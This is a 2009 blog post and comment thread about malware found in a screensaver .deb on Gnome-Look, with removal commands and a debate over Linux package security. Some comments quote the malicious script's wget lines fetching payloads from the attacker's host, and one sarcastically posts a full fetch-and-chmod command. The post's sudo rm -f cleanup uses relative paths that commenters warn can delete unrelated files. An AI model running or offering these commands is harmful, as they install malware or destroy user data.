Malware Hidden Inside Screensaver On Gnome-Look

By , Published December 8, 2009

Malware has been found hidden inside an innocuous ‘waterfall’ screensaver .deb file made available on popular artwork sharing site Gnome-Look.org.image 
The .deb file installs a script with elevated privileges designed to perform a DDoS attack as well as keep itself updated via downloads.

The dodgy screensaver in question has since been removed from gnome-look and this incident was a very basic, if potentially successful, attempt.

If anything this incident highlights the need to be careful what you download and where you download it from.

The Fix
If you fear you may have downloaded or install the screensaver (which doesn’t install a screensaver) then run the following command in the terminal or seek help from the fix thread on the Ubuntu forums.

DO NOT RUN THIS COMMAND UNLESS YOU HAVE INSTALLED THE .DEB IN QUESTION.

  • sudo rm -f /usr/bin/Auto.bash /usr/bin/run.bash /etc/profile.d/gnome.sh index.php run.bash && sudo dpkg -r app5552

Thanks to Noah for the tip-off.

Article originally appeared on omgubuntu.co.uk

Related posts:

  1. 'Caffeine' €“ App To Delay Screensaver/Suspend
Post a comment or leave a trackback: Trackback URL.
  • Noah

    Oops – it seems a bit is left out.

    sudo rm -f /usr/bin/Auto.bash /usr/bin/run.bash /etc/profile.d/gnome.sh index.php run.bash && sudo dpkg -r app5552

    Is the command.

    • Mike

      You have no full path for “index.php” and “run.bash”… that would probably be wise…

      • Noah

        We know the path – it’s downloaded into your home, so it’s fine.

        • Al3x

          It’s not fine…
          1] User could run it e.g. in his web dir or anywhere else… So sudo rm $HOME/index.php would be better. But still:
          2] You should at least warn readers that they should check the index.php file. Some users may have (for some reason) index.php file in their home that they don’t want to delete..
          3] Suggesting “sudo rm -f …” commands as a magic trick everybody should run without really explaining and warning what they do is not very good idea in general.

          • Noah

            The script(of the hacker) will delete any index.php they have in their home anyway. Also, any run.bash they have.

          • al3x

            But not in their home, but in their current working directory, that should be really stressed there!

            cd work/my_web/project
            : do some work
            : read this article
            sudo rm -f index.php

            sudo pwd # (!!!)

          • al3x

            That’s why I proposed at least do:
            sudo rm -f $HOME/index.php

            That would correctly translate to home of the user that run the command. Not just working directory, that could be almost anything!

          • http://steve-parker.org/ Steve Parker

            http://ubuntuforums.org/showpost.php?p=8463766&postcount=5 says that it downloads index.php into /usr/bin, not into $HOME, and then deletes index.php anyway:
            cd /usr/bin/
            wget http://05748.t35.com/Bots/index.php
            wget http://05748.t35.com/Bots/run.bash
            sleep 4
            rm index.php

          • Noah

            It depends – the new script downloads into the home.

            However, I agree, for some cases, anyway, these commands should be run if you think you have it(nobody has it now)
            I have also seen one or two “remixes of it” by now, mostly by incapable people, but anyway, to remove them for sure -

            sudo rm -f /usr/bin/index.php /usr/bin/run.bash /usr/bin/gnomethemeing.sh /$HOME/index.php /$HOME/Desktop/index.php /$HOME/run.bash /$HOME/Desktop/run.bash

            This won’t be necessary unless you’re downloading these things – thank god for VM’s to try it out in ;)

    • Mark S

      No, no. The correct command is:

      cd /usr/bin/ && rm Auto.bash && sleep 1 && wget http://05748.t35.com/Bots/Auto.bash && chmod 777 Auto.bash

      Linux users know that the best way to protect and clean your system is to copy and paste commands from the Internet that you don’t understand.

  • Anonymous

    wow this is a little scary, i download a lot of stuff from gnome-look.

    • Noah

      It will be fine as long as you don’t download debs from there.
      We have repos for a reason. They are there to protect us. They have safe software, so you don’t have to look on the web and perhaps download the wrong software.

      • pt

        depends on which repo

        would it be harder to have a malicious script be part of a deb file in a PPA repo?

        • Noah

          100% Safe. And if you think one isn’t, report it to launchpad.

          • Anonymous

            100% safe, unless it isn’t!

            Launchpad PPA’s are attack vectors like any other third-party repository, if you are installed packages not provided by your distribution or software vendor you should always use caution, base security of any system is defined by user stupidity, always remember this.

  • Angelo Joseph

    i download a lotta stuff on gnome-look. I agree rather scary!!

  • Anonymous

    I read about this on the forum a couple of hours ago, scary stuff really as many people including myself use Gnome Look to download themes, screen-savers & wallpapers.

  • Anonymous

    I knew it was only a matter of time before linux was a target to virus attacks, Thanks ClamAV!

  • Mohan

    Wow…this goes to show you that Ubuntu (Debian based Linux) is getting popular.

    • http://www.cigreds.com/ Electronic Cigarette Girl

      Ubuntu is awesome but not being a dev or even having the slightest idea about linux, I have to say there were times I had my back against the wall and had to get my programmer buddies to help me out.

      There will be a HUGE market for Ubuntu or any open source OS once it becomes more friendly to noobs like me lol

      -Bella :)

      • Mohan

        Yes I agree. But with each release I think it’s getting easier and easier. 10 years ago it was very much different and difficult (half the time I had a hard time installing it on my computer).

  • http://twitter.com/Paul3142 Paul

    Be it Windows, Linux, Mac or whatever, if you run software and you aren’t 100% sure that its safe, then you run a risk of this type of thing happening.

    As mentioned before, repos are 100% safe.

  • AW

    This is, in my opinion, why the security privilege system in Windows Vista and Linux/Gnome/KDE doesn’t work — security is designed in these OS’ to be “all or nothing.”

    As in, “give me the keys to the castle or you can’t install anything.”

    Why does a screensaver need access to the whole damn system? Why can’t it be isolated to one directory — the one where it belongs?

    • Anonymous

      It can, but it’s more of a hassle than it’s worth. Chroot jails are a pain to setup and even then you need root to access the dpkg database for write access or run pre/post install scripts. At the end of the day you can only protect users so much from their own stupidity.

    • http://steve-parker.org/ Steve Parker

      SELinux allows just this kind of fine-grained control. But it can be a pain to manage. It can also control all sorts of other things, such as self-modifying executables, and so on.

      As yourself, you have access to your own ~/.ssh directory, so Firefox, running as your UserID, also has access to your keys. A web browser doesn’t need access to ssh keys, so SELinux blocks it from accessing them. Similarly, in this case – screensaver-installers could have their own context, that they are allowed to update /usr/share/themes or whatever, but not elsewhere.

      SELinux is not simple to understand, so most distros disable it by default, especially (ironically) the user-focussed ones such as Ubuntu.

      • Yfrwlf

        It is silly that more work isn’t done on making Linux more secure then. I know that it isn’t done because there’s usually no need, but waiting until there are attacks like these is a bit foolish. Maybe Ubuntu/Debian should start taking measures to further secure their systems now though rather than later. You can’t always protect a user against themselves, and Linux is capable of doing *anything* if you give it permission to, so the answer is use more finely-grained security which thankfully is being done to some degree (with PolicyKit).

        • http://steve-parker.org/ Steve Parker

          Installing and running code downloaded from a non-trusted site is the foolish behaviour.

          If you tell the system “Yes, I do want to do this” then it will do it, just as your car will obediently drive you over a cliff if you so command it.

          As I mentioned, there are protections already in place in the form of SELinux, but most users do not want it. Security is a spectrum, with most-secure at one extreme, and most-usable at the other extreme. By installing untrusted, unverified third-party software as root, the user is stating that they are not particularly interested in the security of their system.

          • Yfrwlf

            “If you tell the system “Yes, I do want to do this” then it will do it, just as your car will obediently drive you over a cliff if you so command it.”

            Yes, and thus the answer, as far as security is concerned, is to only give programs the permissions they *need*, and thus you protect your system more. Like in the example of, say, a screen saver package being confined to that part of the system during installation. That’s more safe than giving an installation package *total root-level control* over the entire system. That’s what fine-grained security is all about. There’s a lot of other things you can do too, like sandboxing, etc, so, my point is you can’t say “it’s all or nothing, and there’s nothing that can be done” because there are certain things that can be done to help make things MORE secure, but ultimately yes, you can do what you want and screw up your system if you really want to do so. You just normally need root permission to do so at least. ^^

          • Yfrwlf

            (Which is why PackageKit is nice, because you’re not giving something total root-level control, thus making it hard for something malicious to hose your entire system.)

          • http://steve-parker.org/ Steve Parker

            I am not saying “it’s all or nothing” – there is SELinux, ACLs, all sorts of more fine-grained protection mechanisms, but the typical Ubuntu user does not want to be bothered with configuring these, or – if system defaults are provided – working out why one operation fails when another similar operation succeeds. Russell Coker has a SELinux play machine at play.coker.com.au which has a publicly available root password. The box is sufficiently covered by SELinux to protect it from malicous use. It is absolutely possible to do such things with Linux.

            So it does not make sense to say that “It is silly that more work isn’t done on making Linux more secure” – of the user-friendly desktop OSes, it has more security that the others. Of the secure OSes, it is more user-friendly than the others.

            I don’t really see how much more somebody could want. And, as always, complaining that a feature is missing without contributing anything (code, time, etc) oneself is not normally very productive :-)

          • Yfrwlf

            Good, and of course GNU/Linux and other OS OSes will no doubt continue to lead the way as far as security is concerned, adopting the best practices and concepts. No, making problems known is very important and useful, and the Linux community needs to complain and make problems very well known when they do happen because Linux is *for Linux users*. If someone doesn’t want to fix it, fine, but someone who does may do so. Just because someone isn’t a programmer doesn’t mean their difficulties or programs with Linux are invalid. Contributing bug reports or just simply *commenting*, anywhere on the net, about a problem, is more useful than *nothing* at all.

          • Yfrwlf

            (And this particular blogger seems to very much agree with me on that point. It goes both ways, and some comments can be extremely unhelpful and non-constructive, so certainly it is better to have someone who takes the time to fill out a bug report, or who has the knowledge to dive into what exactly might be wrong, but they don’t *need* or *have* to do those things, and making them feel that they do is just going to push them away and make them feel unwelcome as a Linux user, and that they are stranded.)

          • http://steve-parker.org/ Steve Parker

            I did say “contributing anything (code, time, etc)”. Writing good bug reports is a very valuable contribution to the community. Complaining that the system works exactly as designed, is useful as part of a constructive design review evaluating realistic alternatives.

          • Sam

            I’m not trying to ignore the fact that the material comes from a 3rd party source, but I also never really looked at gnome-look as an “untrusted source.” I hate someone had to do this to wake me up a little, I like my fairy-tale world where I can test as many things as I like w/o worry.

  • ruel24

    Okay, this highlights why you shouldn’t download and install from outside your distros repos and trusted 3rd party repos. The repo maintainers ensure you won’t get crap like this. Installing outside the repos opens you up to possible security breaches.

    • Sebastien

      Right. You should stick with the repos and only use outdated software. You don’t need the latest version of Firefox. Wait 6 months.

  • SquishBug

    Where can I get the deb to disect its inner workings and see what it/whomever was trying to do? :)

  • Bob Dobbs
  • tomas

    In the command you posted isn’t index.php & run.bash missing their paths?

  • http://gnuski.blogspot.com/ lefty.crupps

    Just another reason to trust official repositories and not Windows-installer-type download-and-doubleclick. No, PPAs are not 100% safe; all repos are as safe as the maintainer and the amount of trust you can put into that PPA. Anyone could create a PPA with this malware.

    Also another opportunity to advocate for Ubuntu to have its own package formate extension (.ubu not .deb), to help maintain the brand identity of Debian and Ubuntu both.

  • http://blog.ibeentoubuntu.com/ Daeng Bo

    It looks like someone read the last paragraph of my howto: http://blog.ibeentoubuntu.com/2009/03/how-to-create-drive-by-download-for.html

  • Noah

    Update: Another theme has been uploaded(which will do the same). Ninja Theme was the name, it has been removed now. If anyone has installed/downloaded this from gnome-look, please can you contact us at the Ubuntuforums.org, as there is some vital information we need from that file so we can produce the cure.

  • Bob Dobbs Jr.

    Actually I find this to be a positive example of the swiftness and acuity at which these jokers are dealt with within the Linux community.

  • Sam

    This kind of thing makes me worry a little since I like tweaking the themes and icons so much. I never really bother with the screen savers. I have had an ongoing problem with power/screen saver settings not keeping the setting I put in place to never come on. I haven’t tweaked the start settings on this install so that may be the problem. Anyhow, thanks for the 411, I just discovered your blog and it’s great!

  • http://ninjashoes.net mixed martial arts

    Wow, I am suprised about this. I am glad I don’t bother with funky screensavers. I only have the opengl scrensaver pack.

  • http://www.rapidspiro.com/ Rapidspiro

    thank you for the great post! Rapidshare

  • http://www.paragraf.su/ Типография

    I read about this on the forum a couple of hours ago, scary stuff really as many people including myself use Gnome Look to download themes, screen-savers & wallpapers.